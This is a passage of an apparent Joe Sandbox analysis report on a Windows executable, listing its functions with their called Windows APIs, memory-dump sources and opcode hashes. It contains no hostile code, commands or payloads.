Instruction Fuzzy Hash: 4F216572A18B8181FA10EB29F84512AE361FB897B4FA00235EA9D437D9DF3CD548D650

Function 00007FF71614BF64 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF71614BF48), ref: 00007FF71614BF8C
TerminateProcess.KERNEL32(?,?,?,00007FF71614BF48), ref: 00007FF71614BF97
ExitProcess.KERNEL32 ref: 00007FF71614BFA6

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction ID: d75213a049461ecc7743d2f3d1fda23387abbdcb50243633b88fb534d7c01e46
Opcode Fuzzy Hash: 44b3a526fe0d15710854bc957cc7a82f9edee4cc7420f0560de4bec5ea2a17a0
Instruction Fuzzy Hash: 76E01228A05B0546FB947B35AC9537BA3626F89761F505438DC0E03396DF3DA40D6720

Function 00007FF71611F578 Relevance: 3.2, APIs: 2, Instructions: 193COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611F895
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611F89B

Part of subcall function 00007FF716123EC8: FindClose.KERNELBASE(?,?,00000000,00007FF716130811), ref: 00007FF716123EFD

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseFind
String ID:
API String ID: 3587649625-0
Opcode ID: 630dfa6f2e2cd78299e900f381efb2835ec197b4c6a69e36ab04265ceb059ce9
Instruction ID: 568c89fa5daf9cc7a67a5dd971a5175ce7e17dfe449ed5fd627ba3a96f92d47f
Opcode Fuzzy Hash: 630dfa6f2e2cd78299e900f381efb2835ec197b4c6a69e36ab04265ceb059ce9
Instruction Fuzzy Hash: CF91A3B2A18B8195FB10EF39E8401AEA3A1FB947A8FD04135EA5C07AD9DF78D549D310

Function 00007FF716113904 Relevance: 3.1, APIs: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716113AB3
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF716113AB9

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 201b90534166b8da7461634ac6a816a56932a3fdfe7bfd1a1f820e126a9c965b
Instruction ID: d223d1f0aee769236eaab46e6a21fbab751efd4f434cdb3bab1a84d21ed54c84
Opcode Fuzzy Hash: 201b90534166b8da7461634ac6a816a56932a3fdfe7bfd1a1f820e126a9c965b
Instruction Fuzzy Hash: 2A41C3A2F14A5284FB00EB71F8502FEA361AF45BB4F945135DE1D27ADADF389489D310

Function 00007FF716122778 Relevance: 3.1, APIs: 2, Instructions: 100COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000002,?,00000F99,?,00007FF71612274D), ref: 00007FF7161228A9
GetLastError.KERNEL32(?,00007FF71612274D), ref: 00007FF7161228B8

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction ID: 6c6fb8b9031ac938f3a482ab6b838fe0c1422cc183399a2a495acf62f3c3d318
Opcode Fuzzy Hash: 043a82e8aff847b2e282b78885e55c7214a93c585b530bdf19c19deffc600893
Instruction Fuzzy Hash: 2731C622B19D52C1FA606F2AFD406FEA391AF04BF4FA48135DE1D47790DE2CD589B260

Function 00007FF7161122BC Relevance: 3.1, APIs: 2, Instructions: 83COMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 00007FF7161122F1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7161123F0

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Item_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1746051919-0
Opcode ID: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
Instruction ID: 898019f648a9cee868f1415b99107d1db51ea4fa8b85bc58a48e8300812fd73f
Opcode Fuzzy Hash: 5a2890223aea6d88e53338121990f25a14a9249d0429ebf34ef8f54134bab86e
Instruction Fuzzy Hash: B131C5A1A28B4541FA10EB25F8453BBF361EB857A0F804231EB9C07B95DF3CE1899710

Function 00007FF716122AD0 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32 ref: 00007FF716122AFE
SetFileTime.KERNELBASE ref: 00007FF716122B9B

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction ID: 3e0863ffe9bc20413a21ac8593f67cd1e8ece317155b85366d9053a9161ffb56
Opcode Fuzzy Hash: 1f7bfd0f82637a6abdcd08aef8b442a865f6f50d97ba3a1fa7ef62b0e093425a
Instruction Fuzzy Hash: 4C21D122E09F42D1FA62AE11FC003FBD692AF067A4FA5C135DE4C02295EE3CD58ED210

Function 00007FF71612AAE0 Relevance: 3.1, APIs: 2, Instructions: 52COMMON

Download Yara Rule

APIs

LoadStringW.USER32 ref: 00007FF71612AB67
LoadStringW.USER32 ref: 00007FF71612AB80

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction ID: 0c1d5eabcc31d94f094ffdcdaeb310ad0129a2a35dcca3a9020e752dfd8b8141
Opcode Fuzzy Hash: efc1550bd5bba1d5ac9face2304fa075ed5e4cb94ffc19493764f318ca00d951
Instruction Fuzzy Hash: DD114F65B09B4185FA40AF16BC4016AF7A1BB94FE0BA44439CE0D93720DF7CE949D354

Function 00007FF716122BB0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF716122C11
GetLastError.KERNEL32 ref: 00007FF716122C1E

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction ID: 127615f406c22b9ee226ecd8d692ce32e60635c2ba7a443f239dbbfa481f53e4
Opcode Fuzzy Hash: 5eda2cbf1ce6837a88d649c872729f31e823bc49095d59e5e9b193bf7b9166cd
Instruction Fuzzy Hash: CF119321A08A41C1FB50AB25FC412AEA261FB55BB4FE48335DA6D522D4CF3CD99AD310

Function 00007FF71611255C Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF71612A4AC: swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF71612A504
Part of subcall function 00007FF71612A4AC: SetDlgItemTextW.USER32 ref: 00007FF71612A573
Part of subcall function 00007FF71612A4AC: GetWindowRect.USER32 ref: 00007FF71612A5AD
Part of subcall function 00007FF71612A4AC: GetClientRect.USER32 ref: 00007FF71612A5BB

GetDlgItem.USER32 ref: 00007FF7161125AC
SetDlgItemTextW.USER32 ref: 00007FF7161125C8

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Item$RectText$ClientWindowswprintf
String ID:
API String ID: 402765569-0
Opcode ID: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction ID: b43fca41c0da4c6f3861c49b5f1e796b3b41f82bf7d897c33808aa39f48e3de8
Opcode Fuzzy Hash: ad94589889145b650e3461eb84003e845283bd92425fc2a9221c8100a4e27e71
Instruction Fuzzy Hash: EC011290A09B4A42FF997761BCA82FBD7915F85764F884035DC4D0629DDE2CE8CDE320

Function 00007FF71612EB58 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF71612EBAD,?,?,?,?,00007FF716125752,?,?,?,00007FF7161256DE), ref: 00007FF71612EB5C
GetProcessAffinityMask.KERNEL32 ref: 00007FF71612EB6F

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction ID: 9710e6540939c035a9bc02006de56cf2104f59c8062d4d64f6ccb5c7f553e77b
Opcode Fuzzy Hash: 444071b75e142e51b736d9fa504759652bc9944b894df1f8101a797a07211085
Instruction Fuzzy Hash: 20E02B61F14E4686EF489F69D8404EBF3A2BFC8B50FC48036E60B83618DE2CE14D8B00

Function 00007FF7161421D0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF716142200

Part of subcall function 00007FF716142F7C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF716142F85

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF716142206

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
String ID:
API String ID: 1173176844-0
Opcode ID: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
Instruction ID: d124460659e5848dc2d4d068548187fb22fbbf1591babc65b2420cb9ac4b4e91
Opcode Fuzzy Hash: 14867973fed18b2c44dc58e1bcd5f94848bfca26dcf41195b9c376eff134a452
Instruction Fuzzy Hash: 7CE0B660E1A90741F95832723C265F680600F69770ED89730DE3E062C6BF1DA5DEA130

Function 00007FF71614D90C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL ref: 00007FF71614D922
GetLastError.KERNEL32 ref: 00007FF71614D934

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction ID: 03c6d38c99e0c6203de44961c6d69e54bb91e03a7ae3863e7cccacacc7464cce
Opcode Fuzzy Hash: 7829e02dcbd74b51c5e196648e5aad52518f68633834b7095f7e5950a32ae739
Instruction Fuzzy Hash: 52E04F61E0990382FF047BB2BC151B692A19F94770BC44030C90D87252EF2C948DA620

Function 00007FF7161133E4 Relevance: 1.8, APIs: 1, Instructions: 328COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71611388C

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: cc8fab3c86f7d6fe0b03a4b9e3a11541b4bca2b64503b20e80c6e1f24e71eafb
Instruction ID: 613ee2279881651fc57609860afe9e4e8b310af5297eb11df5458f51eb610e67
Opcode Fuzzy Hash: cc8fab3c86f7d6fe0b03a4b9e3a11541b4bca2b64503b20e80c6e1f24e71eafb
Instruction Fuzzy Hash: 0AD1CEB2B08EC556FB549B35AD402BAE7A1FB05BA4F840035CB5D477A9CF38E568E310

Function 00007FF716125294 Relevance: 1.7, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF71612551B

Part of subcall function 00007FF7161313F4: CompareStringW.KERNEL32 ref: 00007FF71613145A

Memory Dump Source

Source File: 00000000.00000002.1674317218.00007FF716111000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF716110000, based on PE: true

Associated: 00000000.00000002.1674299754.00007FF716110000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674347886.00007FF716158000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF71616B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674374278.00007FF716174000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71617E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716185000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716188000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF71618C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1674412234.00007FF716192000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff716110000_bFZYRLnRIz.jbxd

Similarity

API ID: CompareString_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1017591355-0
Opcode ID: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
Instruction ID: 5a291b81c4dd9bf32a7e2bbf3ab1934714ed103450c140cec63f31b76e7f6097
Opcode Fuzzy Hash: a143f18b4ccf410723d5b55495dd87be6177e3dd9b35435d6782b563dee17ef9
Instruction Fuzzy Hash: 2F61C211A0CE87C1FA64BB257C9517BD292AF41BF0FA45139DE4F06AC5FE6CE448A220

Function 00007FF716131870 Relevance: 1.7, APIs: 1, Instructions: 172COMMON

Download Yara Rule

APIs

